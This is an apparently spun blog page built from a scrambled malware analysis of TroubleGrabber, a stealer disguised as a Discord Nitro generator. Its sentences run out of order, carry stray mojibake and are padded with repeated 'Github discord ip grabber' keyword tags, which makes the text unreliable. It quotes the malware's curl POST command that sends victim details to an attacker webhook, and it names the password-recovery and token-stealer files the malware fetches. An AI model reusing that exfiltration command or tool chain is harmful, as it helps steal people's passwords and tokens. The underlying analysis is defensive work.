This utility has a history of being used by threat actors to steal the stored passwords and send them back to their C2. #Github discord ip grabber passwordWebBrowserPassView.exe is a password recovery utility from Nirsoft that reveals the passwords saved in web browsers. #Github discord ip grabber verificationCurl performs SSL certificate verification by using the public certificate authorities present in the file curl-ca-bundle.crt for uploading, downloading, and posting data. The malware uses a curl command for posting status message of the victim’s details via webhook as follows: C:/temp/curl -X POST -H "Content-type: application/json" -data "" Webhook Curl-ca-bundle.crtĬurl-ca-bundle.crt is the certificate used by curl to validate with the remote server. #Github discord ip grabber generatorFigure 3: Decompiled code of Discord Nitro Generator and Checker.exeįigure 3 illustrates that the executable downloads the next stage payloads to “C:/temp” from the seven URLs hosted in Discord and Github as listed below The functionality of curl.exe, Curl-ca-bundle.crt, WebBrowserPassView.exe, tokenstealer.vbs, Tokenstealer2.vbs,Tokenstealer.bat, and sendhookfile.exe is as follows: Curl.exeĬurl.exe is a command-line tool that is used for uploading, downloading, and posting data over multiple supported protocols. An excerpt from the decompiled code is shown in Figure 3. #Github discord ip grabber archiveThe archive contained an executable file named “Discord Nitro Generator and Checker.exe”. The downloaded archive “Discord_Nitro_Generator_and_Checker.rar” masqueraded as a Discord Nitro Generator application. The sample we are using for this analysis was hosted in the Discord URL – (md5 – 172c6141eaa2a9b09827d149cb3b05ca). It then sends them as a chat message back to the attacker via a webhook URL. The payloads steal victims credentials like system information, IP address, web browser passwords, and tokens.TruoubleGrabber using Discord and Github for downloading the next stage payloads to the victim’s machine.The delivery of TroubleGrabber to the victim’s machine via Discord attachment link.The depiction in Figure 2 illustrates the following steps Figure 2: TroubleGrabber attack kill chain The visual depiction of the TroubleGrabber attack kill chain is shown in Figure 2. The files associated with these detections used Discord for malware delivery, next stage payloads, and C2 communication. TroubleGrabber – Gen:Variant.Razy.742965 and Gen:Variant.Razy.728469 were the first stage payload of Gen:Variant.Razy.729793, a new malware variant we had not seen before October 2020.All the files associated with these detections were delivered via Discord. #Github discord ip grabber cracked
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |